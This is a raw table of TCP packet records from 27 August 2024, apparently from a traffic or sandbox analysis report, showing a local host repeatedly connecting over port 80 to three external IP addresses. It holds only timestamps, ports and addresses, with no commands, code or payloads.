Aug 27, 2024 14:19:30.753801107 CEST	80	52225	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:30.753881931 CEST	52225	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:30.753997087 CEST	52225	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:30.758749008 CEST	80	52225	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:31.171866894 CEST	80	52224	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:31.171948910 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.172655106 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.177433014 CEST	80	52224	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:31.409513950 CEST	80	52224	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:31.409569979 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.435477972 CEST	52219	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:31.435574055 CEST	52225	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:31.515789032 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.516087055 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.520904064 CEST	80	52226	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:31.520931005 CEST	80	52224	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:31.521019936 CEST	52224	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.521028996 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.521174908 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:31.525909901 CEST	80	52226	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:31.547522068 CEST	52227	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:31.547540903 CEST	52228	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:31.552525997 CEST	80	52227	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:31.552540064 CEST	80	52228	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:31.552622080 CEST	52227	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:31.552623987 CEST	52228	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:31.552706957 CEST	52227	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:31.552752018 CEST	52228	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:31.557499886 CEST	80	52227	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:31.557589054 CEST	80	52228	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:32.199358940 CEST	80	52226	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:32.201258898 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.202038050 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.206835032 CEST	80	52226	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:32.439558983 CEST	80	52226	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:32.439671993 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.545519114 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.545866966 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.550770044 CEST	80	52226	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:32.550810099 CEST	80	52229	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:32.550837040 CEST	52226	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.550884008 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.550997972 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:32.555846930 CEST	80	52229	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:33.137406111 CEST	80	52227	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:33.137578964 CEST	52227	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:33.139898062 CEST	52227	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:33.144664049 CEST	80	52227	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:33.162692070 CEST	52230	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:33.167576075 CEST	80	52230	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:33.167659044 CEST	52230	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:33.202692032 CEST	52230	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:33.207516909 CEST	80	52230	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:33.229038954 CEST	80	52229	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:33.229115009 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.241228104 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.246140957 CEST	80	52229	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:33.482312918 CEST	80	52229	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:33.482368946 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.592972994 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.597629070 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.598157883 CEST	80	52229	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:33.598221064 CEST	52229	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.602560043 CEST	80	52231	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:33.602627039 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.602741003 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:33.607528925 CEST	80	52231	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:34.297353029 CEST	80	52231	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:34.297425985 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.298187017 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.303025007 CEST	80	52231	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:34.574062109 CEST	80	52231	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:34.574146032 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.686197996 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.686542034 CEST	52232	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.691648006 CEST	80	52232	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:34.691752911 CEST	52232	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.691777945 CEST	80	52231	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:34.691831112 CEST	52231	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.697031975 CEST	52232	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:34.701865911 CEST	80	52232	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:34.784123898 CEST	80	52230	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:34.784202099 CEST	52230	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:34.784290075 CEST	52230	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:34.789098978 CEST	80	52230	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:34.889766932 CEST	52233	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:34.894759893 CEST	80	52233	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:34.894829035 CEST	52233	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:34.895878077 CEST	52233	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:34.900686979 CEST	80	52233	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:35.529243946 CEST	52228	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:35.529320002 CEST	52232	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:35.529347897 CEST	52233	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:35.530354977 CEST	52234	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:35.530405998 CEST	52235	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:35.530591011 CEST	52236	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:35.535351992 CEST	80	52234	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:35.535368919 CEST	80	52235	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:35.535423994 CEST	80	52236	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:35.535439968 CEST	52234	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:35.535484076 CEST	52236	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:35.535490990 CEST	52235	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:35.535619974 CEST	52234	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:35.535717010 CEST	52235	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:35.535757065 CEST	52236	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:35.540558100 CEST	80	52234	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:35.540606022 CEST	80	52235	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:35.540657043 CEST	80	52236	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:36.363821030 CEST	80	52236	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:36.363893986 CEST	52236	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:36.498478889 CEST	52236	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:36.498857975 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:36.503842115 CEST	80	52237	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:36.503901958 CEST	80	52236	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:36.503911972 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:36.503973007 CEST	52236	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:36.504146099 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:36.509115934 CEST	80	52237	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:37.161578894 CEST	80	52235	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:37.161729097 CEST	52235	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:37.164084911 CEST	52235	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:37.168962002 CEST	80	52235	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:37.226305008 CEST	80	52237	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:37.226377964 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.227051973 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.232734919 CEST	80	52237	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:37.279985905 CEST	52238	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:37.285054922 CEST	80	52238	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:37.285156965 CEST	52238	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:37.285243034 CEST	52238	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:37.290245056 CEST	80	52238	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:37.492486000 CEST	80	52237	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:37.492568016 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.608474016 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.608793974 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.613796949 CEST	80	52237	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:37.613835096 CEST	80	52239	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:37.613907099 CEST	52237	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.613955975 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.614106894 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:37.619108915 CEST	80	52239	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:38.405477047 CEST	80	52239	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:38.405561924 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.406321049 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.412214994 CEST	80	52239	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:38.690541983 CEST	80	52239	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:38.690602064 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.821103096 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.821357012 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.826773882 CEST	80	52239	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:38.826791048 CEST	80	52241	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:38.826848984 CEST	52239	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.826895952 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.827178001 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:38.831952095 CEST	80	52241	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:38.894887924 CEST	80	52238	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:38.894956112 CEST	52238	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:38.897505999 CEST	52238	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:38.902354002 CEST	80	52238	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:38.939450026 CEST	52242	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:38.944365025 CEST	80	52242	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:38.944448948 CEST	52242	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:38.959023952 CEST	52242	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:38.963927031 CEST	80	52242	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:39.509700060 CEST	80	52241	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:39.509805918 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.510641098 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.515533924 CEST	80	52241	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:39.529273987 CEST	52234	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:39.529328108 CEST	52242	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:39.639446020 CEST	52243	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:39.640738010 CEST	52244	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:39.645629883 CEST	80	52243	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:39.645709038 CEST	52243	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:39.645849943 CEST	52243	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:39.647053003 CEST	80	52244	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:39.647104025 CEST	52244	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:39.647183895 CEST	52244	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:39.651329041 CEST	80	52243	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:39.652060032 CEST	80	52244	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:39.794229984 CEST	80	52241	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:39.794329882 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.905255079 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.905632019 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.910476923 CEST	80	52241	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:39.910495043 CEST	80	52245	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:39.910537958 CEST	52241	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.910581112 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.910759926 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:39.917372942 CEST	80	52245	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:40.611368895 CEST	80	52245	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:40.611465931 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:40.612142086 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:40.616903067 CEST	80	52245	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:40.895749092 CEST	80	52245	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:40.895828962 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:40.998471975 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:40.998761892 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:41.003540993 CEST	80	52245	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:41.003556013 CEST	80	52246	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:41.003588915 CEST	52245	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:41.003632069 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:41.003746033 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:41.010683060 CEST	80	52246	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:41.250855923 CEST	80	52243	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:41.251004934 CEST	52243	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:41.251080990 CEST	52243	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:41.251946926 CEST	52247	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:41.255851984 CEST	80	52243	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:41.256936073 CEST	80	52247	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:41.257020950 CEST	52247	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:41.257107019 CEST	52247	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:41.261887074 CEST	80	52247	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:41.721282959 CEST	80	52246	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:41.721363068 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:41.722055912 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:41.726914883 CEST	80	52246	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:42.016254902 CEST	80	52246	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:42.016325951 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.123581886 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.123884916 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.130414009 CEST	80	52248	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:42.130428076 CEST	80	52246	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:42.130482912 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.130511999 CEST	52246	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.130640984 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.135900021 CEST	80	52248	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:42.816400051 CEST	80	52248	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:42.816452026 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.817132950 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:42.822875023 CEST	80	52248	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:42.863107920 CEST	80	52247	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:42.863188028 CEST	52247	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:42.863243103 CEST	52247	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:42.869386911 CEST	80	52247	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:42.967536926 CEST	52249	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:42.972950935 CEST	80	52249	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:42.973052025 CEST	52249	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:42.973182917 CEST	52249	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:42.978189945 CEST	80	52249	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:43.099509954 CEST	80	52248	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:43.099591017 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.201603889 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.201939106 CEST	52250	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.381788015 CEST	80	52250	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:43.381814003 CEST	80	52248	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:43.381880045 CEST	52250	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.381903887 CEST	52248	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.382126093 CEST	52250	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.386961937 CEST	80	52250	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:43.529294968 CEST	52244	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:43.529350042 CEST	52249	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:43.529385090 CEST	52250	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.530309916 CEST	52251	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:43.530478001 CEST	52252	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.530678034 CEST	52253	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:43.536423922 CEST	80	52251	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:43.536443949 CEST	80	52252	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:43.536458015 CEST	80	52253	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:43.536514997 CEST	52251	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:43.536554098 CEST	52253	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:43.536554098 CEST	52252	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.536684990 CEST	52253	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:43.536686897 CEST	52252	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:43.536784887 CEST	52251	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:19:43.542064905 CEST	80	52253	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:43.542082071 CEST	80	52252	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:43.542093039 CEST	80	52251	89.23.103.42	192.168.2.6
Aug 27, 2024 14:19:44.233797073 CEST	80	52252	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:44.233879089 CEST	52252	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:44.342190027 CEST	52252	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:44.342499971 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:44.347418070 CEST	80	52252	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:44.347457886 CEST	80	52254	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:44.347487926 CEST	52252	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:44.347538948 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:44.347651958 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:44.352509975 CEST	80	52254	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:45.057466030 CEST	80	52254	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:45.057532072 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.058666945 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.064616919 CEST	80	52254	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:45.157619953 CEST	80	52253	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:45.157696962 CEST	52253	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:45.157782078 CEST	52253	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:45.163170099 CEST	80	52253	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:45.264775038 CEST	52255	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:45.270591021 CEST	80	52255	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:45.270684004 CEST	52255	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:45.270776987 CEST	52255	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:45.276370049 CEST	80	52255	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:45.299628019 CEST	80	52254	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:45.299717903 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.404838085 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.405128002 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.409869909 CEST	80	52254	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:45.409946918 CEST	52254	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.409981966 CEST	80	52256	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:45.410058022 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.410207987 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:45.415090084 CEST	80	52256	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:46.103482008 CEST	80	52256	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:46.103544950 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.106496096 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.113724947 CEST	80	52256	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:46.351480007 CEST	80	52256	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:46.351545095 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.467291117 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.467685938 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.472683907 CEST	80	52257	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:46.472775936 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.472902060 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.472910881 CEST	80	52256	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:46.472964048 CEST	52256	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:46.477714062 CEST	80	52257	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:46.922437906 CEST	80	52255	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:46.922498941 CEST	52255	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:46.922599077 CEST	52255	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:46.925187111 CEST	52258	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:46.927426100 CEST	80	52255	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:46.930979013 CEST	80	52258	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:46.931056023 CEST	52258	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:46.931158066 CEST	52258	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:19:46.936031103 CEST	80	52258	185.209.162.226	192.168.2.6
Aug 27, 2024 14:19:47.163496017 CEST	80	52257	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:47.163605928 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.164454937 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.169898033 CEST	80	52257	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:47.400667906 CEST	80	52257	185.208.158.116	192.168.2.6
Aug 27, 2024 14:19:47.400876999 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.523881912 CEST	52257	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.524281025 CEST	52259	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:19:47.529599905 CEST	80	52259	185.208.158.116	192.168.2.6
